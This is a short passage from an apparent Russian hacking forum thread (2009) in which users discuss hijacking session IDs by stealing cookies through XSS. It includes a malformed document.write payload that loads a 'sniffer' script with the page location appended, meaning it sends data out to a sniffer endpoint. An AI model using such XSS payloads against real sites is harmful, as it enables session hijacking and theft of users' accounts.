03.08.2009, 15:35
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от Pavlov
Что за SID и кеш? Если SID, это SesionID, то да.
Както так:
document.write('<html><body><script src=sniffer/img.gif?"+document.location></script></body></html>');
Ты знаеш что такое GET запрос?
Сообщение от Pashkela
Вообще-то сессии с помощью XSS угоняются из cookie, если в куках есть сессия - можно угнать, если найти xss
Даже если прекрипить скнифер в место картинки всеровно не получится?
Последний раз редактировалось SeNaP; 03.08.2009 в 15:40..
|
|
|